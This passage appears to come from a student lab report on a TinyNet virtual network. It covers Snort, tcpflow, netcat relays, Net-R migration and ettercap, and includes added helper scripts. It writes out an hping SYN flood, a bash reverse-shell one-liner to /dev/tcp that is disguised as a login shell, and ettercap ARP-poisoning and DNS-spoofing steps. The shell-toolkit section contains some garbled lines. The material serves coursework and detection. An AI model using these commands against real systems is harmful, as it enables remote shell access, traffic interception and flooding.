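    chmod 644 "$d/.ssh/id_rsa"; chmod 600 "$d/.ssh/authorized_keys"
    audit_ssh_perms "$d" || true     # reports BAD for the home dir and id_rsa
    rm -rf "$d"
}

demo
```

On the lab machines run `audit_ssh_perms "$HOME"` on the local system and on the remote one to confirm the chmod steps took effect.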
Screenshots
Figure 54 ssh-keygen

Figure 55 Copy keys in Gateway

SSH key copied through gateway

Changing permissions in gateway


Changing permission in mailhost

Run the necessary variables and add the private key to the agent

Adding code to bashrc


9. IDS

Owner: Pranesh Maharjan

Objective of this enhancement

Snort is an open source Intrusion Detection System (IDS). It is used for detecting different types of
activity on the system. This enhancement sets up snort and, using hping2 and multitail, demonstrates
triggering a specific snort rule. hping2 is used to generate traffic and multitail to display the
recognised traffic.

List of configuration files

Snort is a default package that comes with the TinyNetConfig.iso file. First we install the
snort package by opening the SetupMenu file under the /mnt/hdc directory. Inside the SetupMenu we
chose Snort, which is under Install Other packages. After the installation of snort we
configure the snort file.
Changing the snort rules path:
Go to the directory /etc/snort/ and edit the file snort.conf by changing RULE_PATH to
/etc/snort/rules. Then on line 667 we uncomment the output alert_syslog line and add
five new rule includes as follows:
"include $RULE_PATH/gpl-back~r.rules
include $RULE_PATH/gpl-ddos.rules
include $RULE_PATH/http.rules
include $RULE_PATH/icmp.rules
include $RULE_PATH/other.rules"

After adding the 5 rule files we confirm that the paths point to the correct directories:
"var RULE_PATH /rules
var PREPROC_RULE_PATH /preproc_rules"

Screenshots of tests with their explanation


This screenshot is of installing the Snort package by going to the SetupMenu under the /mnt/hdc
directory. Here, we have selected Install other packages and under it Snort is selected.

This screenshot shows that snort package is installed.


Here, the RULE_PATH of the file snort.conf is confirmed to be /etc/snort/rules and that of
PREPROC_RULE_PATH is to be /etc/snort/preproc_rules.

The alert syslog is uncommented here.


To start Snort, the following command is used:
"snort -c /etc/snort/snort.conf -A console"

In this screen a DDoS-style flood is generated with the hping tool from the gateway to the webserver.
In this command "-c" is the number of packets, "-d" is the data size (size of packet sent), "-S" sets
the SYN flag, "-w" is the window size (default is 64), "-p" is the port number, and "--rand-source" is
random source address mode.
This screen shows how snort monitors the attack on the webserver.

Obstacles
10. Compile and Install
a) Setup a VM using the TinyNet-gcc image
b) Install the asciiart package from the configuration CD
c) Compile the toilet source code and demonstrate using shell scripts
d) Explain the last four lines of the SlaxBuild script

Owner:

List the relevant configuration files, and for each one briefly describe what was done

Setting up the GCC virtual machine

A virtual machine is set up with the TinyNet-gcc.iso file, assigning 320 MB of RAM and a
550 MB hard disk. Then, by running liloinst.sh, the basic operating system is made accessible.
Installation of necessary packages
The Asciiart package is installed from TinyNetConfig.iso, mounted from the optical drive.
Installing files from the Asciiart package
Asciiart requires the libcaca, sl and toilet files. Four files, called template, libcaca, sl and toilet,
are displayed under /opt/. Of those, the files toilet-0.3.tar.gz, sl-5.02.tar.gz and
libcaca-0.99.beta19.tar.gz are required. We extract them in the /opt/ directory, which gives
three directories: /opt/libcaca-0.99.beta19, /opt/toilet-0.3 and /opt/sl-5.02. They are built
with commands like ./libcaca.build, ./sl.build and ./toilet.build.
 
Libcaca configuration
The libcaca build script is created by copying Template.SlaxBuild within the /opt/ directory
and renaming the copy "libcaca.build".
Configure the libcaca.build file as:
PRGNAM=libcaca ("replace with name of the application")
VERSION=0.99.beta19 ("replace with version of the application")
SRCFN=.tar ("replace with source archive type")

Inside the libcaca.build file the following lines are added and the others are uncommented:
   --disable-csharp \
   --disable-java \
   --disable-python \
   --disable-ruby
After all this, libcaca.build is run with ./libcaca.build, which prints out build information.
Toilet build configuration
After making sure that libcaca.build ran and compiled smoothly, the toilet code is compiled
next. Template.SlaxBuild is copied in /opt/ and modified into "toilet.build".
Update the toilet file as:
PRGNAM=toilet ("replace with name of the application")
VERSION=0.3 ("replace with version of the application")
SRCFN=.tar.gz ("replace with source archive type")
The section under "#automake Build Options" is uncommented.
 
 
Toilet view with shell script
After toilet.build has been run successfully, the following is written into a shell script:
cat>AnyNameYouLike
#!/bin/bash
Under supercharged ://my-tiny.net/L 18-aart.htm and toilet -f mono9 $(pwd +%A) are
used.
After saving the file, the shell script is made executable, and the script is configured with
-F gay border "LycheePie" to demonstrate toilet.build inside the shell script.
 

What do the last four lines of the SlaxBuild script do?

The last four lines of SlaxBuild package the program as part of the build, rather than
manually. They produce a proper "slackware package" that can be installed and uninstalled
when upgrading the program.
 
FIG: - Slaxbuild script
Screenshot of sl (the Linux Steam Locomotive)

Fig: - Result of sl
Screenshots of tests, with explanations
Fig: - login into GCC
Fig: - /opt/ after toilet.build

Fig: - Lycheepie
Obstacles encountered, obstacles overcome

The toilet.build and libcaca.build scripts were difficult to run at first, but this was later
corrected by applying chmod permissions.

Any Outstanding/Unresolved Issues

The script command takes time to load.


11. regex
a) Describe three ways using regular expressions with MultiTail can make logfile
monitoring/analysis more effective
b) Evaluate txt2regex as a tool for creating regular expressions to use with MultiTail: What
are its strengths? What are its weaknesses? What do you wish it would do? How would
you change it?

Owner:

Three ways using regular expressions with MultiTail

 
Multitail has a text highlighting feature using "colorschemes".
The multitail command below follows two files (i.e. an Apache access log and the Tomcat
Catalina log) with two different colorschemes:
"multitail -cS apache /tmp/apache/access_log -cS log4j ${TOMCAT_HOME}/logs/catalina.out"
A colorscheme is used to highlight text, and additional colorschemes can be added to
~/.multitailrc:
"check_mail:0
colorscheme:xml
# element text
cs_re_s:white:>([^<]*)<
# attribute key
cs_re_s:green: ([^ =]*)=
# attribute value
cs_re_s:red:=("[^"]*")
# element name
cs_re:blue,,bold:<[^>]*>"

Multitail then uses that scheme with the following command:
"multitail -cS xml /var/log/config.xml"
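To check what each regex in that colorscheme actually selects before relying on it, here is an added shell example (written for this page, not from the report or from MultiTail). It assumes, as I read the colorscheme format, that cs_re_s colours only the parenthesised subexpression while cs_re colours the whole match; the scheme file and the XML line it is run on are constructed.

```shell
#!/bin/sh
# Added example, not from the report: show the text that each rule of a
# multitail colorscheme would colour on a given line. Assumed semantics:
# cs_re_s selects only the parenthesised group, cs_re the whole match.
# Regexes are assumed not to contain '#', which is used as the sed delimiter.

# cs_matches SCHEME_FILE LINE: prints "COLOUR<TAB>SELECTED" per rule, in file order
cs_matches() {
    scheme=$1; line=$2
    grep -E '^cs_re(_s)?:' "$scheme" | while IFS= read -r rule; do
        kind=${rule%%:*}          # cs_re or cs_re_s
        rest=${rule#*:}
        colour=${rest%%:*}        # e.g. white or blue,,bold
        re=${rest#*:}             # everything after the second colon
        # first match of the whole regex on the line (empty if none)
        hit=$(printf '%s\n' "$line" | grep -oE -e "$re" | head -n 1)
        if [ "$kind" = cs_re_s ] && [ -n "$hit" ]; then
            # keep only group 1 of that match
            hit=$(printf '%s\n' "$hit" | sed -E "s#^$re\$#\1#")
        fi
        printf '%s\t%s\n' "$colour" "$hit"
    done
}

# Constructed scheme: the xml colorscheme from the report, plus a sample line
demo=$(mktemp -d)
cat > "$demo/scheme" <<'EOF'
colorscheme:xml
# element text
cs_re_s:white:>([^<]*)<
# attribute key
cs_re_s:green: ([^ =]*)=
# attribute value
cs_re_s:red:=("[^"]*")
# element name
cs_re:blue,,bold:<[^>]*>
EOF
cs_matches "$demo/scheme" '<user name="otto">hi</user>'
```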

Evaluation of txt2regex

Txt2regex is used to convert plain-text descriptions into regexes. The "/txt2regex.sh" command is
used to run the bash program, which works only in bash version >= 2.04. The program builds
regexes for more than 20 programs, such as procmail.

Screenshots of tests, with explanations

Fig: - colorscheme
Obstacles encountered, obstacles overcome

None

Any Outstanding/Unresolved Issues

None
12. Protocol Analysis

Owner:

Objective

The objective of this enhancement is to use tcpflow to capture the dialog between the browser
and the webserver when
i. accessing the default Monkey webpage. How can we recover the images?
ii. accessing a mailbox in SquirrelMail.

List of configurations

tcpflow is installed by default on every TinyNet server. We can use "-ce" to print to the screen,
as in the following command:
"root$ tcpflow -p -c -i eth0 port 80 | grep -oE '(GET|POST|HEAD) .* HTTP/1.[01]|Host: .*'"
The above command gives us a list of the HTTP verbs we need. "eth0" is the name of the
machine's interface and can be replaced with another interface name if required.
Now, type the following command on the webserver:
"tcpflow -v -i any -s 'host 192.168.56.252 and port 80'"
The above command generates files under the /root directory of the server.
Now, open another terminal with Alt + F2, start the links browser on the webserver and open
SquirrelMail in it.

Screenshots of tests, with explanations

The above screen shows the listening on the port for the IP address "192.168.56.252".
The above screen appears after the IP address is entered.
13. Migrate to Net-R
Owner: Pranesh Maharjan (NP000323)
Objective:

List of configurations

Configure the NET-R Servers


i. After the final configuration of all servers we can now clone all four servers, i.e.
Webserver, Mailhost and LDAP.
ii. First we should change the HOSTNAME to net-r and change the CNAMEs for all the
cloned servers on the Net-R domserv.
iii. Now on Mailhost, we should add the following section to the file
/etc/stunnel/mh.server.conf
"
; Net-R addition
[smtps]
accept = 465
connect = 587
"
iv. Now we should change the file /etc/postfix.cf to serve the subnet
"
mydestination = localhost, $mydomain, localhost.$mydomain,
$myhostname, webmail.$mydomain,
# net-a.$mydomain, net-b.$mydomain, net-c.$mydomain
net-r.$mydomain

mynetworks = 127.0.0.0/8
# 192.168.56.0/24 192.168.66.0/24 192.168.76.0/24
192.168.234.0/24"
v. Now we have to add a line for Net-R to /etc/postfix/virtual_mailbox
vi. Enter the command
"/usr/sbin/postmap /etc/postfix/virtual_mailbox"
Finally we add the standard accounts. We can add the standard users to /home/vmail/mail-pwd.
There will be an error for mail going outside the subnet because of the designated relayhost.
Now heading to the WebServer,
i. change the file /etc/stunnel/www.server.conf to use the Mailhost.
"
[smtps]
accept = 587
; connect = gw.tinynet.edu:465
connect = mailhost.net-r.tinynet.edu:465"
ii. Now, adjust the $domain in /var/ww/squirrelmail/config/config_svr_adrs.php
iii. Set the IP address for the hosts as
"ifconfig eth0 192.168.234.120"
iv. Now we should add the iptables rules by editing the file /etc/rc.d/rc.inetd1

Screenshots
Describe the Net-R automatic traffic generation system

The hosts on the network send (silly) messages to each other once the network has two hosts.
A user with username "otto" logs in automatically when the system is turned on; we can see
this user by pressing Alt + F8. Whenever a host joins the network, it is added to the frenzy,
resulting in a fairly busy subnet. The DHCP lease time is two minutes.
Obstacles encountered
14. Port Knock
Owner:
Objective

List of configuration

To set up the Netcat relay, enter the following command


"mkfifo /tmp/piper"
Enter the following command in one of the virtual terminals on domserv:
"nc -l -p 23432 < /tmp/piper | tee /dev/stderr | nc localhost 587 | tee /tmp/piper"
and in another virtual terminal type the telnet commands:
"telnet localhost
HELO sending.server.name
MAIL FROM: mailadmin@mailhost.tinynet.edu
RCPT TO: mailgovind@mailhost.tinynet.edu
DATA
Subject: HELLO
Hi There
.
QUIT"
Then in another virtual terminal we check the connection on the listener side too. The output is
sent to both the screen (stderr) and nc (stdout) first, and the named pipe is used second to
catch input from both sides of the conversation.

For the reverse shell, type


“bsdnc -lkv 23435”
An interactive shell is piped to it from the remote host with a classic one-liner from. This is
then compared to the way a tty is created inside the file "/var/net-r/autologin.sh", which is
similar to the following script:
"#!/bin/bash
echo "My PID is $$" # for testing
exec bash -i 0</dev/tcp/192.168.66.66/23435 1>&0 2>&0"
The commands typed on the listening server are executed on the target and the output is sent
back. To close the socket, type "exit". If the test line is left uncommented, "ps -ax" shows the
associated name, including the shell script's PID, which has been replaced by "bash -i". It looks
similar to "-bash", which is a normal login shell.
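As an added example for the defender's side of what this section shows (written for this page, not from the report): the "bash -i" in the ps listing looks like a login shell, but its three standard descriptors all point at one socket, which a normal "-bash" on a tty never does. The check below walks a /proc-style tree and reports shells in that state; the tree it runs on is a constructed sample, and the PROC_ROOT argument is a hypothetical convenience so the same function can also be pointed at the real /proc.

```shell
#!/bin/sh
# Added example, not from the report: report shell processes whose stdin,
# stdout and stderr are all the same socket, the footprint that
# "exec bash -i 0</dev/tcp/HOST/PORT 1>&0 2>&0" leaves behind. The first
# argument is a /proc-like directory so a constructed tree can be checked.

# find_socket_shells [PROC_ROOT]: prints "PID ARGV SOCKET" per matching process
find_socket_shells() {
    proc=${1:-/proc}
    for d in "$proc"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        # cmdline is NUL-separated; turn it into "argv0 argv1 ..."
        argv=$(tr '\0' ' ' < "$d/cmdline" | sed 's/ *$//')
        cmd=${argv%% *}; cmd=${cmd##*/}
        case $cmd in bash|-bash|sh|-sh|dash|ash|zsh) ;; *) continue ;; esac
        fd0=$(readlink "$d/fd/0" 2>/dev/null) || continue
        fd1=$(readlink "$d/fd/1" 2>/dev/null) || continue
        fd2=$(readlink "$d/fd/2" 2>/dev/null) || continue
        # a login shell on a tty points these at /dev/tty* or /dev/pts/*; flag sockets only
        case $fd0 in socket:*) ;; *) continue ;; esac
        [ "$fd0" = "$fd1" ] && [ "$fd0" = "$fd2" ] || continue
        echo "${d##*/} $argv $fd0"
    done
    return 0
}

# Constructed /proc-like tree: one socket-bound "bash -i", one ordinary login shell
demo=$(mktemp -d)
mkdir -p "$demo/4242/fd" "$demo/4243/fd"
printf '%s\0' bash -i > "$demo/4242/cmdline"
for n in 0 1 2; do ln -s 'socket:[31337]' "$demo/4242/fd/$n"; done
printf '%s\0' -bash > "$demo/4243/cmdline"
for n in 0 1 2; do ln -s /dev/tty1 "$demo/4243/fd/$n"; done
find_socket_shells "$demo"    # -> 4242 bash -i socket:[31337]
```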

Screenshots
15. Ettercap

Owner:
Objective

List of configuration
For ARP with ettercap
- We should first install Ettercap from the TinynetConfig.iso
- Start ettercap with "ettercap -C"
- Go to "Sniff" and select "Unified sniffing". Then, in the "Hosts" menu, select "Scan for
hosts" and after that go to "Host list", which shows the hosts ettercap found. Then select
domserv (192.168.234.101) from the host list and press 1 to add it to the target list.
- Then exit the host list, go to the "Targets" menu and select "Current targets". The screen
then shows the catch-and-forward traffic between Target 1 and Target 2.
- After that, exit the target list. Now select the "Mitm" menu and then "ARP poisoning" to
spoof the ARP tables, and press "enter" to leave the parameters box empty.
Now go to domserv, start links and log into SquirrelMail on the Net-R webserver.
- Try "arp" on each VM to view the output.
For DNS
- Do the same steps as for ARP up to "Unified sniffing".
- Then go to the Hosts menu and select "Host list", and again select domserv
(192.168.234.101) in the host list, pressing 2 to add it to the target list. After that, exit the
host list and select "Plugins" and "Manage plugins" from the menu. Now select "dns_spoof"
and press "enter"; the zero shown on the left then changes to one.
- Exit "Plugins", select the "Mitm" menu and then "ARP poisoning" to spoof the ARP tables,
leaving the parameters box empty.
- Ping the address given in the configuration from the Net-R webserver or Mailhost. Use links
on one of them to see the new website.
- Use the following command line for the two-phase attack:
"ettercap -T -q -P dns_spoof -M arp // //"